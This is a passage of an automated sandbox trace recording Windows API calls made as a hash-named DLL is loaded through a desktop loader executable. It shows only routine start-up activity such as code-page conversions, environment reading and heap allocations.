hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0268.439] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0268.439] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0268.439] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0268.439] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_has_thread_support" [0268.439] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_has_thread_support" [0268.440] GetACP () returned 0x4e4 [0268.440] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x228) returned 0x54aca0 [0268.440] IsValidCodePage (CodePage=0x4e4) returned 1 [0268.440] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0268.440] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0268.440] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0268.440] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0268.440] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0268.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0268.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0268.441] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0268.441] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0268.441] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0268.441] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0268.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0268.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0268.441] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0268.441] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0268.441] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0268.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0268.441] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0268.442] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1000) returned 0x5570f0 [0268.624] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0268.624] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0268.624] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0268.624] AreFileApisANSI () returned 1 [0268.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0268.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0268.624] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xd0) returned 0x544860 [0268.625] GetEnvironmentStringsW () returned 0x558100* [0268.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4e6) returned 0x558ae0 [0268.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x558ae0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0268.625] FreeEnvironmentStringsW (penv=0x558100) returned 1 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x118) returned 0x54a8f0 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1f) returned 0x54b4a0 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2e) returned 0x544fa0 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x31) returned 0x544fe0 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3c) returned 0x5503b0 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x31) returned 0x545020 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x14) returned 0x545060 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x24) returned 0x54b770 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xd) returned 0x549900 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1d) returned 0x54b5c0 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x31) returned 0x543ec0 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x15) returned 0x544090 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x17) returned 0x542600 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xe) returned 0x543f00 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x69) returned 0x543f20 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3e) returned 0x54ff50 [0268.625] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1d) returned 0x54b4d0 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x48) returned 0x550680 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x12) returned 0x54ba20 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x18) returned 0x54ba40 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1b) returned 0x54b7a0 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1e) returned 0x54b5f0 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x29) returned 0x558890 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1e) returned 0x54b500 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x6b) returned 0x54ba60 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x17) returned 0x54bae0 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xf) returned 0x548d00 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x16) returned 0x548d20 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2a) returned 0x5587d0 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x29) returned 0x558210 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x12) returned 0x559360 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x21) returned 0x54b530 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x16) returned 0x5593a0 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x22) returned 0x54b800 [0268.626] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x12) returned 0x559220 [0268.626] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558ae0 | out: hHeap=0x540000) returned 1 [0268.627] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa3a7) returned 0x5593e0 [0268.629] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x54b830 [0268.629] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa3a7) returned 0x563790 [0268.631] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5593e0 | out: hHeap=0x540000) returned 1 [0268.631] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfef7) returned 0x56db40 [0268.635] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5508b0 [0268.635] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfef7) returned 0x57da40 [0268.637] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x54b830 | out: hHeap=0x540000) returned 1 [0268.637] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56db40 | out: hHeap=0x540000) returned 1 [0268.638] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x450) returned 0x558910 [0268.638] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x450) returned 0x58d940 [0268.638] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558910 | out: hHeap=0x540000) returned 1 [0268.638] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1ea7) returned 0x58dda0 [0268.638] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf40) returned 0x5593e0 [0268.639] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x7a0) returned 0x55a330 [0268.639] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58dda0 | out: hHeap=0x540000) returned 1 [0268.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5593e0 | out: hHeap=0x540000) returned 1 [0268.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xbf0) returned 0x5593e0 [0268.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x55a330 | out: hHeap=0x540000) returned 1 [0268.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x640) returned 0x558910 [0268.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1247) returned 0x58d940 [0268.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5593e0 | out: hHeap=0x540000) returned 1 [0268.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558910 | out: hHeap=0x540000) returned 1 [0268.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x520) returned 0x558910 [0268.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1b56) returned 0x5593e0 [0268.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558910 | out: hHeap=0x540000) returned 1 [0268.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8a0) returned 0x58d940 [0268.640] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x28ed) returned 0x55af40 [0268.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5593e0 | out: hHeap=0x540000) returned 1 [0268.640] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x550) returned 0x558910 [0268.641] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558910 | out: hHeap=0x540000) returned 1 [0268.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2537) returned 0x58d940 [0268.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x12b7) returned 0x5593e0 [0268.641] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x950) returned 0x55d840 [0268.642] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.642] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5593e0 | out: hHeap=0x540000) returned 1 [0268.642] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x3d4f) returned 0x55e1a0 [0268.642] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x55af40 | out: hHeap=0x540000) returned 1 [0268.642] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x55d840 | out: hHeap=0x540000) returned 1 [0268.642] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2377) returned 0x58d940 [0268.642] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x11d7) returned 0x561f00 [0268.643] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8e0) returned 0x5593e0 [0268.643] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.643] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x561f00 | out: hHeap=0x540000) returned 1 [0268.643] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5593e0 | out: hHeap=0x540000) returned 1 [0268.643] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5b0) returned 0x558910 [0268.643] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558910 | out: hHeap=0x540000) returned 1 [0268.643] RtlAllocateHeap 